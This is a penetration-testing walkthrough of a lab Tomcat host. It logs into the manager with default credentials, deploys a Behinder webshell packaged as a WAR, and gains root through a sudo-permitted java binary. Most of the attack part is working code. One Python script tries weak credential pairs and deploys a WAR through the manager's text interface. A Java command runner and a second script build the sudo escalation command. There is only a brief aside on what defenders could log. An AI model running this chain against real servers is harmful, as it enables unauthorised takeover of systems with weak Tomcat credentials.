Penetration Testing: MyTomcat Host

Port scan with Nmap: ports 22 (SSH) and 8080 are open.

Port 8080 serves the Tomcat manager interface. Two things to try here: weak credentials, and the Ghostcat AJP vulnerability (CVE-2020-1938).

(This Tomcat version is not in the range affected by Ghostcat.)

The weak credentials tomcat:tomcat work:

[Screenshot 1]

Package the Behinder (冰蝎) JSP shell into a WAR: jar cvf shell.war .\shell.jsp

Opening the JSP directly in a browser returns HTTP 500, but connecting to it with the Behinder client succeeds:
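The manager deployment above, automated, as an added example that is not code from the original post: it tries a short list of assumed weak credential pairs against the manager's text interface, builds the WAR the same way jar cvf does (a zip with META-INF/MANIFEST.MF and the JSP at its root), and deploys it with a PUT to /manager/text/deploy. The target URL, the credential list and the JSP body are placeholders chosen for the example.

```python
import base64
import io
import sys
import urllib.error
import urllib.parse
import urllib.request
import zipfile

# Constructed placeholder JSP; the post used a Behinder shell.jsp in this slot.
SAMPLE_JSP = b'<%= "alive" %>'

# Assumed weak credential pairs to try; tomcat:tomcat is the one that worked on this host.
WEAK_CREDS = [("tomcat", "tomcat"), ("admin", "admin"), ("tomcat", "s3cret"), ("admin", "")]


def build_war(jsp_bytes, jsp_name="shell.jsp"):
    """Same layout `jar cvf shell.war shell.jsp` produces: MANIFEST plus the JSP at the
    archive root, so Tomcat serves it at /<context>/<jsp_name>."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\r\n\r\n")
        war.writestr(jsp_name, jsp_bytes)
    return buf.getvalue()


def war_entries(war_bytes):
    """Names inside a WAR, in archive order (confirms the JSP sits at the root)."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        return war.namelist()


def manager_request(base_url, user, password, command, path=None, body=None):
    """Request for the manager text interface: GET /manager/text/<command>, or PUT with
    the WAR as the body for deploy. Credentials go in an HTTP Basic header."""
    url = f"{base_url.rstrip('/')}/manager/text/{command}"
    if path is not None:
        url += "?" + urllib.parse.urlencode({"path": path})
    req = urllib.request.Request(url, data=body, method="PUT" if body is not None else "GET")
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    req.add_header("Authorization", f"Basic {token}")
    if body is not None:
        req.add_header("Content-Type", "application/octet-stream")
    return req


def send(req, timeout=10):
    """Return (status, text). The manager answers 'OK - ...' or 'FAIL - ...'; 401 is a bad
    password, 403 is a valid account that lacks the manager-script role."""
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode("utf-8", "replace")


def find_working_creds(base_url, pairs=WEAK_CREDS):
    """First (user, password) pair that can list applications, or None."""
    for user, password in pairs:
        status, text = send(manager_request(base_url, user, password, "list"))
        if status == 200 and text.startswith("OK"):
            return user, password
    return None


def deploy_war(base_url, user, password, context, war_bytes):
    """Deploy the WAR at /<context>; returns the manager's status code and status line."""
    req = manager_request(base_url, user, password, "deploy", path=f"/{context}", body=war_bytes)
    status, text = send(req)
    return status, text.strip()


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "http://192.0.2.10:8080"  # assumed target
    creds = find_working_creds(target)
    if creds is None:
        sys.exit("no weak manager credentials worked")
    user, password = creds
    print(f"manager login works as {user}:{password}")
    print(deploy_war(target, user, password, "shell", build_war(SAMPLE_JSP)))
    print(f"shell should now answer at {target}/shell/shell.jsp")
```

The text interface requires the manager-script role. An account that only holds manager-gui (enough for the HTML upload form the post used) gets 403 here, in which case fall back to the browser upload. Either route leaves a deployment message in catalina.out and a request for /manager in the access log, which is what a defender should be alerting on.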

[Screenshot 2]

Open Behinder's virtual terminal and check sudo: java can be run with sudo. (A slip of the hand changed the permissions on the sudoers file, after which sudo could not be executed at all. sudo refuses to start unless /etc/sudoers is owned by root and mode 0440, so a wrong mode on that file locks every user out of sudo, including the path to root being set up here.)

[Screenshot 3]

Then upload Java code that executes system commands:

[Screenshot 4]

import java.io.BufferedReader;
import java.io.Closeable;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.util.Arrays;
import java.util.List;
import java.util.StringTokenizer;

/** Runs a program with ProcessBuilder and returns its exit code plus merged stdout/stderr. */
public class ProcessUtils {
	private static final String DEFAULT_CHARSET_NAME = "UTF-8";

	public static Result run(String command) {
		return run(command, DEFAULT_CHARSET_NAME);
	}

	/** Splits one command string on whitespace; shell quoting is not interpreted. */
	public static Result run(String command, String charsetName) {
		StringTokenizer st = new StringTokenizer(command);
		String[] commandArray = new String[st.countTokens()];
		for (int i = 0; st.hasMoreTokens(); i++) {
			commandArray[i] = st.nextToken();
		}
		return run(Arrays.asList(commandArray), charsetName);
	}

	public static Result run(List<String> command) {
		return run(command, DEFAULT_CHARSET_NAME);
	}

	public static Result run(List<String> command, String charsetName) {
		Result result = new Result();
		InputStream is = null;
		try {
			// redirectErrorStream(true) merges stderr into stdout, so a single reader drains
			// both and the child cannot block on a full stderr pipe.
			Process process = new ProcessBuilder(command).redirectErrorStream(true).start();
			is = process.getInputStream();
			BufferedReader reader = new BufferedReader(new InputStreamReader(is, charsetName));
			StringBuilder data = new StringBuilder();
			String line;
			while ((line = reader.readLine()) != null) {
				data.append(line).append(System.lineSeparator());
				System.out.println("\033[0;35m" + line + "\033[0m"); // echo each line in magenta
			}
			result.code = process.waitFor();
			result.data = data.toString().trim();
		} catch (Exception e) {
			throw new RuntimeException(e);
		} finally {
			closeStreamQuietly(is);
		}
		return result;
	}

	private static void closeStreamQuietly(Closeable stream) {
		try {
			if (stream != null) {
				stream.close();
			}
		} catch (IOException e) {
			// ignore
		}
	}

	/** Exit code and captured output of one run. */
	public static class Result {

		public int code;

		public String data;
	}

	/** Usage: java ProcessUtils <program> [args...]. Under sudo, <program> runs as root. */
	public static void main(String[] args) {
		if (args.length == 0) {
			System.err.println("usage: java ProcessUtils <program> [args...]");
			System.exit(2);
		}
		Result r = ProcessUtils.run(Arrays.asList(args));
		System.out.println("code:" + r.code + "\ndata:" + r.data);
	}
}


Compile it on Windows and upload the class file to the server. The class must be compiled for a bytecode level the server's JRE accepts (javac --release N on JDK 9+, or -source/-target on JDK 8), otherwise the JVM rejects it with UnsupportedClassVersionError:

[Screenshot 5]

Then run the class through sudo java: the program it spawns executes as root, which gives root on the box.
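Two checks worth making from the webshell before taking the root step, as an added example that is not code from the original post. It parses sudo -l output (a constructed sample for a tomcat user is embedded) to confirm java is allowed without argument restrictions, assembles the sudo command line for the uploaded class, reads the major version out of a compiled .class header so a class built on a newer Windows JDK is not rejected by an older server JVM, and encodes the ownership/mode rule that explains why the changed sudoers permission killed sudo. The class directory /tmp, the class name ProcessUtils and the sample output are assumptions.

```python
import os
import re
import stat
import struct

# Constructed sample of `sudo -l` output for this example (not taken from the original host).
SAMPLE_SUDO_L = """\
Matching Defaults entries for tomcat on mytomcat:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User tomcat may run the following commands on mytomcat:
    (ALL) NOPASSWD: /usr/bin/java
    (root) /usr/bin/systemctl status tomcat, /usr/bin/tail /var/log/tomcat/catalina.out
"""

# One sudoers entry per line: "(runas[ : group]) [TAG: ...] cmd1, cmd2"
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+?)\s*$")


def parse_sudo_l(output):
    """Return one (runas_user, nopasswd, command) tuple per command sudo would allow."""
    entries = []
    for line in output.splitlines():
        m = ENTRY_RE.match(line)
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in m.group("cmds").split(", "):
            entries.append((runas, nopasswd, cmd.strip()))
    return entries


def sudo_java_entries(entries):
    """Entries that run a java binary with no fixed arguments, i.e. where we pick the class.
    An entry such as '/usr/bin/java -jar /opt/app.jar' is excluded: its arguments are pinned."""
    hits = []
    for runas, nopasswd, cmd in entries:
        parts = cmd.split()
        if os.path.basename(parts[0]) == "java" and len(parts) == 1:
            hits.append((runas, nopasswd, cmd))
    return hits


def escalation_command(entry, classdir, classname, *args):
    """Command line that runs <classname> from <classdir> as root via the sudo-able java."""
    runas, nopasswd, java = entry
    cmd = ["sudo"]
    if nopasswd:
        cmd.append("-n")  # never prompt: a webshell has no tty to type a password into
    cmd += [java, "-cp", classdir, classname, *args]
    return cmd


def class_major_version(class_bytes):
    """Class file header: magic 0xCAFEBABE, u2 minor, u2 major (big-endian)."""
    magic, _minor, major = struct.unpack(">IHH", class_bytes[:8])
    if magic != 0xCAFEBABE:
        raise ValueError("not a Java class file")
    return major


def java_release(major):
    """Java 5 is major 49 and each release adds one, so release = major - 44 (8 -> 52, 11 -> 55)."""
    return major - 44


def class_runs_on(class_bytes, server_release):
    """A JVM loads class files up to its own major version, never newer ones."""
    return java_release(class_major_version(class_bytes)) <= server_release


def sudoers_mode_ok(st_mode, st_uid):
    """sudo refuses to run unless /etc/sudoers is mode 0440 and owned by uid 0."""
    return stat.S_IMODE(st_mode) == 0o440 and st_uid == 0


if __name__ == "__main__":
    entries = parse_sudo_l(SAMPLE_SUDO_L)
    for hit in sudo_java_entries(entries):
        print(" ".join(escalation_command(hit, "/tmp", "ProcessUtils", "id")))
    # Constructed header of a class compiled with --release 11 (major 55).
    header = b"\xca\xfe\xba\xbe\x00\x00\x00\x37"
    print("runs on a Java 8 server:", class_runs_on(header, 8))
    st = os.stat("/etc/sudoers") if os.path.exists("/etc/sudoers") else None
    if st is not None:
        print("sudoers mode/owner acceptable to sudo:", sudoers_mode_ok(st.st_mode, st.st_uid))
```

On the real host the sudo -l output replaces SAMPLE_SUDO_L; if the java entry carries fixed arguments the class cannot be substituted and this route is closed. The class check is the cheap way to avoid an UnsupportedClassVersionError after the upload, and the sudoers check is how to tell in advance whether the file's mode was already damaged.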
